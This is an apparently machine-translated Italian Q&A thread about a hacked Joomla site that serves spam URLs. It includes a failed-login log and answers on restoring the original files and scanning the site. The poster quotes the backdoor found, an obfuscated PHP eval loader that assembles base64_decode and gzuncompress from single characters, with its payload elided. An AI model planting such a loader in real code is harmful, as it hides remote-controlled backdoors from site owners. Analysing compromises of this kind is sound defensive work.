Hack: URL anymonous sul mio sito Joomla [Risolvi] [chiuso]

Naviga le tue risposte
2

Il mio sito Web è stato violato di nuovo. Esistono molti URL stranieri come qui .

Ho controllato il database e non c'è niente di strano nel mio database. Qualcuno sa che tipo di attacco hack è come questo?

Quindi devo eseguire tutti i file con exit (); e esco "su /libraries/import.legacy.php".

Se do exit () sotto 

JLoader :: register ('JRoute', JPATH_PLATFORM. '/joomla/application/route.php');

il risultato è che il mio sito Web è ancora in grado di camminare, ma con lo strano collegamento.

Ma se fornisco exit() in sopra 

JLoader :: register ('JRoute', JPATH_PLATFORM. '/joomla/application/route.php')

Il risultato è che il sito si ferma.

questo il mio log degli errori 

Software: Joomla Platform 12.2.0 Stable [ Neil Armstrong ] 21-September-2012 00:00 GMT

#Fields: datetime   priority    category    message
2014-02-07T09:50:19+00:00   INFO    joomlafailure   Username and password do not match or you do not have an account yet.
2014-02-20T02:46:05+00:00   INFO    joomlafailure   Username and password do not match or you do not have an account yet.
2014-02-20T19:49:05+00:00   INFO    joomlafailure   Username and password do not match or you do not have an account yet.
2014-02-25T14:25:09+00:00   INFO    joomlafailure   Username and password do not match or you do not have an account yet.
2014-03-02T09:51:23+00:00   INFO    joomlafailure   Username and password do not match or you do not have an account yet.
2014-03-03T03:47:15+00:00   INFO    joomlafailure   Username and password do not match or you do not have an account yet.
2014-03-04T09:36:38+00:00   INFO    joomlafailure   Username and password do not match or you do not have an account yet.
2014-03-04T09:36:58+00:00   INFO    joomlafailure   Username and password do not match or you do not have an account yet.
2014-03-05T04:14:22+00:00   INFO    joomlafailure   Username and password do not match or you do not have an account yet.
2014-03-05T12:27:10+00:00   INFO    joomlafailure   Username and password do not match or you do not have an account yet.
2014-03-09T01:17:12+00:00   INFO    joomlafailure   Username and password do not match or you do not have an account yet.
2014-03-11T15:03:30+00:00   INFO    joomlafailure   Username and password do not match or you do not have an account yet.
2014-03-11T15:03:38+00:00   INFO    joomlafailure   Username and password do not match or you do not have an account yet.


ho trovato questo .. Risolvi .. 

$word = "b" . "a" . "s" . "e" . "6" . "4" . "_" . "d" . "e" . "c" . "o" . "d" . "e";
$wp1 = "g" . "z" . "u" . "n" . "c" . "o" . "m" . "p" . "r" . "e" . "s" . "s";
eval/**test*/(/**test*/$wp1/**test*/(/**test*/$word('Code)));

Grazie a tutti

    
posta Evelyn Raditya 11.03.2015 - 09:52
fonte

2 risposte

3

JRoute è il modulo con il compito di gestire gli URL interni. Il codice malvagio si sta agganciando lì per far sì che tali URL mostrino la loro pagina spam.

Potresti vedere cosa hanno cambiato confrontando i file con quelli ufficiali di Joomla. Alla fine, dovresti sostituire i file php di Joomla compromessi con quelli originali.

    
risposta data 11.03.2015 - 10:23
fonte
-2

Si legge come un generatore a catena di Markov, si spera che sia solo un software di traduzione e non un'invasione:)

Un file .htaccess modificato potrebbe essere la fonte del tuo URL / contenuto indesiderato. Ti consigliamo inoltre di eseguire joomscan sul tuo sito web per verificare la presenza di vulnerabilità note.

    
risposta data 11.03.2015 - 21:57
fonte

Leggi altre domande sui tag

Perché i nodi tor mantengono le chiavi TLS con tutti gli altri nodi Tor? Rischio reale di un Cisco ASA 5505 con modalità aggressiva IKEv1 con PSK